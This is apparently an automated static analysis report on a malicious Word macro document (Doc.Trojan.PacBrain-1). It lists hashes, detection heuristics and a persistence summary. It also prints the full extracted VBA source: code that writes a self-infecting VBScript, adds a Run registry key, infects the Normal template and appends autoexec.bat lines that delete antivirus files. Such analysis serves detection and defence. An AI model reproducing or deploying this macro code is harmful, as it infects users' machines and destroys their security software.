Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f444f17651ace9ff…

MALICIOUS

Office (OLE)

32.0 KB Created: 2002-08-28 14:40:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: a23138c80655c3f69ac945166ee382ba SHA-1: f1dcd90fb81964f5d5d743137bb84ffe6d10ed5a SHA-256: f444f17651ace9ff8f9f5af8de1e49e53befcd85c379e7938593ea221dc46c52
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that, upon closing the document, attempt to write a VBScript to 'C:\muffin.vbs' and create a registry entry 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run\muffin' pointing to this script. This indicates an attempt to establish persistence. The ClamAV detection 'Doc.Trojan.PacBrain-1' further supports the malicious nature of the file.

Heuristics 5

  • ClamAV: Doc.Trojan.PacBrain-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.PacBrain-1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Open "C:\muffin.vbs" For Output As #1
    Print #1, "Set wordobj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
    Print #1, "muffin = wscript.ScriptFullName"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3519 bytes
SHA-256: cc8ee659b234fcab0cc79e92e4dfff9398bdad5dedc2485822c99c2b793c38c2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Attribute VB_Name = "THIS DOCUMENT"
'W2000\Hllp.Muffin Man
'created by ahsanjutt a.vkiller

Private Sub Document_Close()
On Error Resume Next
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "muffin") = "C:\muffin.vbs"
Open "C:\muffin.vbs" For Output As #1
Print #1, "Set wordobj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "muffin = wscript.ScriptFullName"
Print #1, "Set NT = wordobj.NormalTemplate.VBProject.VBComponents.Item(1)"
Print #1, "NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines"
Print #1, "NT.CodeModule.AddFromFile muffin"
Print #1, "NT.CodeModule.DeleteLines 1, 7"
Print #1, "wordobj.Quit"
Print #1, TD
Close #1
End Sub

Private Sub Retro()
On Error Resume Next
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "echo muffin muffin muffin"
Print #1, "echo ** muffin **"
Print #1, "echo want some"

Print #1, "echo [Norton System Check]"
Print #1, "del c:\progra~1\norton~1\*.exe"
Print #1, "del c:\progra~1\norton~1\*.dll"
Print #1, "del c:\progra~1\norton~1\*.dat"

Print #1, "del c:\progra~1\norton~1\*.vxd"
Print #1, "del c:\norton~1\*.exe"
Print #1, "del c:\norton~1\*.dll"
Print #1, "del c:\norton~1\*.dat"
Print #1, "del c:\norton~1\*.vxd"
Print #1, "echo."

Print #1, "echo [AVP System Check]"
Print #1, "del c:\progra~1\antiv~1\*.avc "
Print #1, "del c:\progra~1\antiv~1\*.set "
Print #1, "del c:\progra~1\antiv~1\*.dll "
Print #1, "del c:\progra~1\antiv~1\*.vxd "
Print #1, "del c:\progra~1\antiv~1\*.exe "
Print #1, "del c:\antiv~1\*.avc "

Print #1, "del c:\antiv~1\*.set "
Print #1, "del c:\antiv~1\*.dll "
Print #1, "del c:\antiv~1\*.vxd "
Print #1, "del c:\antiv~1\*.exe "
Print #1, "echo."

Print #1, "echo [McAfee System Check]"
Print #1, "del c:\progra~1\mcafee~1\*.dat "
Print #1, "del c:\progra~1\mcafee~1\*.dll "
Print #1, "del c:\progra~1\mcafee~1\*.exe "
Print #1, "del c:\progra~1\mcafee~1\*.vsc "
Print #1, "del c:\progra~1\mcafee\*.dat "

Print #1, "del c:\progra~1\mcafee\*.dll "
Print #1, "del c:\progra~1\mcafee\*.exe "
Print #1, "del c:\progra~1\mcafee\*.vsc "
Print #1, "del c:\mcafee~1\*.dat"
Print #1, "del c:\mcafee~1\*.dll"
Print #1, "del c:\mcafee~1\*.exe"
Print #1, "del c:\mcafee~1\*.vsc"
Print #1, "del c:\mcafee\*.dat"
Print #1, "del c:\mcafee\*.dll"
Print #1, "del c:\mcafee\*.exe"
Print #1, "del c:\mcafee\*.vsc"
Print #1, "echo."
Close #1
End Sub
If Month(Now) = 12 And Day(Now) = 14 Then
IF(NOT(FE(`C:\\NTLDR.')),`RR("KERNEL32","Sleep","U")')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`C:\\\\CFBEY.COM',qchPath,0)')
End If